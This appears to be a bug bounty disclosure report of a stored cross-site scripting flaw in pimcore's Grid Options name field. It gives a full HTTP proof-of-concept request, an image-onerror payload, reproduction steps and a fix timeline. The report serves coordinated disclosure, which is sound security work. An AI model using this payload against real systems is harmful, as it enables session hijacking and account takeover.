Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Valid

Reported on

Mar 4th 2022


Description

Stored XSS in parameter Name when save Grid Options

Proof of Concept

// PoC.req
POST /admin/object-helper/grid-save-column-config HTTP/1.1
Host: 10.x-dev.pimcore.fun
Cookie: PHPSESSID=cef9a977bc8ae8591f7b3b14bcafedf4; pimcore_admin_sid=1; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDY0MDc3MTUuNjQzNDYyLCJwdGciOnsiX20iOjEsIl9jIjoxNjQ2NDA3NTE1LCJfdSI6MTY0NjQwNzcxNSwidmk6c3J1IjpbN119LCJleHAiOjE2NDY0MDk1MTV9.TSYQ87XOy6JUG6eCkdGu0O_r5KiN7unQr1qOIwQ6HKQ; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2NDY0MDc3MTUuNjQzNTMsInB0ZyI6eyJjbWY6c2ciOnsiODYwIjoxfSwiX2MiOjE2NDY0MDc1MTUsIl91IjoxNjQ2NDA3NTE1fSwiZXhwIjoxNjc3OTQzNzE1fQ.NzpeEedWPQiAv-DK5_6_sxcktFG5WCj4SMXg7nYeKUI
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.x-dev.pimcore.fun/admin/?_dc=1646407514&perspective=
X-Pimcore-Csrf-Token: 823ca1bd46711728be4d0851176b0a91e070f17e
X-Pimcore-Extjs-Version-Major: 7
X-Pimcore-Extjs-Version-Minor: 0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5481
Origin: https://10.x-dev.pimcore.fun
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

id=1086&class_id=CAR&gridconfig=%7B%22language%22%3A%22en%22%2C%22pageSize%22%3A25%2C%22sortinfo%22%3Afalse%2C%22classId%22%3A%22CAR%22%2C%22columns%22%3A%7B%22id%22%3A%7B%22name%22%3A%22id%22%2C%22position%22%3A1%2C%22hidden%22%3Afalse%2C%22width%22%3A52%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22id%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22id%22%2C%22position%22%3A0%7D%7D%2C%22fullpath%22%3A%7B%22name%22%3A%22fullpath%22%2C%22position%22%3A2%2C%22hidden%22%3Afalse%2C%22width%22%3A219%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22fullpath%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22fullpath%22%2C%22position%22%3A1%7D%7D%2C%22published%22%3A%7B%22name%22%3A%22published%22%2C%22position%22%3A3%2C%22hidden%22%3Afalse%2C%22width%22%3A40%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22published%22%2C%22type%22%3A%22system%22%2C%22label%22%3A%22published%22%2C%22position%22%3A2%7D%7D%2C%22name%22%3A%7B%22name%22%3A%22name%22%2C%22position%22%3A4%2C%22hidden%22%3Afalse%2C%22width%22%3A63%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22name%22%2C%22type%22%3A%22input%22%2C%22label%22%3A%22Name%22%2C%22config%22%3A%7B%22width%22%3Anull%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22input%22%2C%22width%22%3Anull%2C%22defaultValue%22%3Anull%2C%22queryColumnType%22%3A%22varchar%22%2C%22columnType%22%3A%22varchar%22%2C%22columnLength%22%3A190%2C%22regex%22%3A%22%22%2C%22unique%22%3Afalse%2C%22showCharCount%22%3Afalse%2C%22name%22%3A%22name%22%2C%22title%22%3A%22Name%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%2C%22defaultValueGenerator%22%3A%22%22%7D%2C%22position%22%3A3%7D%7D%2C%22bodyStyle%22%3A%7B%22name%22%3A%22bodyStyle%22%2C%22position%22%3A5%2C%22hidden%22%3Afalse%2C%22width%22%3A400%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22bodyStyle%22%2C%22type%22%3A%22manyToOneRelation%22%2C%22label%22%3A%22Body%20Style%22%2C%22config%22%3A%7B%22width%22%3A400%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22manyToOneRelation%22%2C%22width%22%3A400%2C%22assetUploadPath%22%3A%22%22%2C%22relationType%22%3Atrue%2C%22queryColumnType%22%3A%7B%22id%22%3A%22int(11)%22%2C%22type%22%3A%22enum('document'%2C'asset'%2C'object')%22%7D%2C%22objectsAllowed%22%3Atrue%2C%22assetsAllowed%22%3Afalse%2C%22assetTypes%22%3A%5B%5D%2C%22documentsAllowed%22%3Afalse%2C%22documentTypes%22%3A%5B%5D%2C%22classes%22%3A%5B%7B%22classes%22%3A%22BodyStyle%22%7D%5D%2C%22pathFormatterClass%22%3A%22%22%2C%22name%22%3A%22bodyStyle%22%2C%22title%22%3A%22Body%20Style%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%7D%2C%22position%22%3A4%7D%7D%2C%22color%22%3A%7B%22name%22%3A%22color%22%2C%22position%22%3A6%2C%22hidden%22%3Afalse%2C%22width%22%3A60%2C%22locked%22%3Afalse%2C%22fieldConfig%22%3A%7B%22key%22%3A%22color%22%2C%22type%22%3A%22multiselect%22%2C%22label%22%3A%22Color%22%2C%22config%22%3A%7B%22width%22%3A%22%22%2C%22height%22%3A%22%22%7D%2C%22layout%22%3A%7B%22fieldtype%22%3A%22multiselect%22%2C%22options%22%3A%5B%7B%22key%22%3A%22grey%22%2C%22value%22%3A%22grey%22%7D%2C%7B%22key%22%3A%22beige%22%2C%22value%22%3A%22beige%22%7D%2C%7B%22key%22%3A%22silver%22%2C%22value%22%3A%22silver%22%7D%2C%7B%22key%22%3A%22brown%22%2C%22value%22%3A%22brown%22%7D%2C%7B%22key%22%3A%22orange%22%2C%22value%22%3A%22orange%22%7D%2C%7B%22key%22%3A%22yellow%22%2C%22value%22%3A%22yellow%22%7D%2C%7B%22key%22%3A%22blue%22%2C%22value%22%3A%22blue%22%7D%2C%7B%22key%22%3A%22black%22%2C%22value%22%3A%22black%22%7D%2C%7B%22key%22%3A%22green%22%2C%22value%22%3A%22green%22%7D%2C%7B%22key%22%3A%22red%22%2C%22value%22%3A%22red%22%7D%2C%7B%22key%22%3A%22white%22%2C%22value%22%3A%22white%22%7D%5D%2C%22width%22%3A%22%22%2C%22height%22%3A%22%22%2C%22maxItems%22%3A%22%22%2C%22renderType%22%3A%22list%22%2C%22optionsProviderClass%22%3A%22%22%2C%22optionsProviderData%22%3A%22%22%2C%22queryColumnType%22%3A%22text%22%2C%22columnType%22%3A%22text%22%2C%22dynamicOptions%22%3Afalse%2C%22name%22%3A%22color%22%2C%22title%22%3A%22Color%22%2C%22tooltip%22%3A%22%22%2C%22mandatory%22%3Afalse%2C%22noteditable%22%3Afalse%2C%22index%22%3Afalse%2C%22locked%22%3Afalse%2C%22style%22%3A%22%22%2C%22permissions%22%3Anull%2C%22datatype%22%3A%22data%22%2C%22relationType%22%3Afalse%2C%22invisible%22%3Afalse%2C%22visibleGridView%22%3Atrue%2C%22visibleSearch%22%3Atrue%7D%2C%22position%22%3A5%7D%7D%7D%2C%22onlyDirectChildren%22%3Afalse%2C%22searchFilter%22%3A%22%22%2C%22sqlFilter%22%3A%22%22%7D&searchType=folder&settings=%7B%22sharedUserIds%22%3A%22%22%2C%22sharedRoleIds%22%3A%22%22%2C%22gridConfigId%22%3Anull%2C%22gridConfigName%22%3A%22%5C%22%3E%3CiMg%20SrC%3D%5C%22x%5C%22%20oNeRRor%3D%5C%22alert(1)%3B%5C%22%3E%22%2C%22gridConfigDescription%22%3A%22%22%2C%22owner%22%3A%22admin%22%2C%22modificationDate%22%3A%22Fri%20Mar%2004%202022%2022%3A55%3A25%20GMT%2B0700%20(Indochina%20Time)%22%2C%22shareGlobally%22%3Afalse%2C%22setAsFavourite%22%3Afalse%2C%22isShared%22%3Atrue%7D&context=&type=object

Step to Reproduct

After login at https://10.x-dev.pimcore.fun/admin

Goto Data Objects and Click to any Folder like Events, Shop, upload

Then choose Save Grid Options or click to Grid Options at tab Save & Share

At field Name input with payload : "><iMg SrC="x" oNeRRor="alert(1);">

The XSS will trigger when User click to dropdown at Grid Options

Image PoC

poc

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We are processing your report and will contact the pimcore team within 24 hours. 3 months ago
We have contacted a member of the pimcore team and are waiting to hear back 3 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 3 months ago
Divesh Pahuja validated this vulnerability 3 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the pimcore team. We will try again in 7 days. 3 months ago
Divesh Pahuja confirmed that a fix has been merged on 6e0922 2 months ago
Divesh Pahuja has been awarded the fix bounty
to join this conversation